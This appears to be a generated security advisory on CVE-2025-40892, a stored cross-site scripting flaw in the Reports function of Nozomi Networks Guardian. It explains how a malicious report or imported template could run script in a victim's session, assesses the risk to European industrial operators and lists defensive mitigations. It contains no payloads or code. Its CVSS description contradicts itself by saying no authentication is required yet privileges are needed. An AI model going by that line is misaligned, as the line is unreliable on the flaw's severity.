CVE-2025-40892 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79, discovered in the Reports functionality of Nozomi Networks Guardian. The root cause is improper neutralization of input during web page generation, specifically in the handling of report parameters. An authenticated user with report creation or modification privileges can craft a report containing malicious JavaScript code. Alternatively, an attacker can socially engineer a victim into importing a malicious report template. When the victim views or imports the report, the embedded script executes within their browser context, inheriting their session privileges. This enables the attacker to perform unauthorized actions such as modifying application data, disrupting the availability of the application, and accessing sensitive information that should be restricted. The vulnerability has a CVSS 4.0 base score of 7.1, indicating high severity, with network attack vector, low attack complexity, no authentication required for exploitation (though privileges are needed), and user interaction required. The scope is limited to the affected application, but the impact on confidentiality, integrity, and availability is high. No patches or exploits are currently publicly available, but the vulnerability is published and should be addressed promptly. The vulnerability affects all versions of Nozomi Guardian prior to the fix, and the lack of patch links suggests a fix may be forthcoming or in progress.

For European organizations, especially those operating critical infrastructure and industrial control systems where Nozomi Networks Guardian is deployed, this vulnerability could lead to significant operational disruptions. Attackers exploiting this XSS flaw could manipulate monitoring data, causing false alerts or masking real threats, thereby undermining incident response efforts. Unauthorized data modification and access to sensitive information could lead to compliance violations under GDPR and other regulations. Disruption of application availability could impact real-time monitoring and control, potentially causing safety and operational risks. The requirement for authenticated access limits exposure but does not eliminate risk, as insider threats or compromised credentials could be leveraged. Social engineering to import malicious reports increases the attack surface. The impact is particularly critical in sectors such as energy, manufacturing, and transportation, which are prevalent in countries like Germany, France, and the UK.

Organizations should immediately review and restrict report creation and import privileges to trusted personnel only. Implement strict validation and sanitization of all inputs related to report generation and importing, ideally applying web application firewalls (WAFs) with custom rules to detect and block malicious scripts. Monitor and audit report templates for suspicious content regularly. Employ multi-factor authentication and robust credential management to reduce the risk of compromised accounts being used to exploit this vulnerability. Educate users about the risks of importing reports from untrusted sources to mitigate social engineering vectors. Coordinate with Nozomi Networks for timely patch deployment once available. In the interim, consider disabling the report import functionality if feasible or isolating the Guardian interface to trusted networks only. Conduct penetration testing focused on XSS vectors in the Guardian environment to identify any additional weaknesses.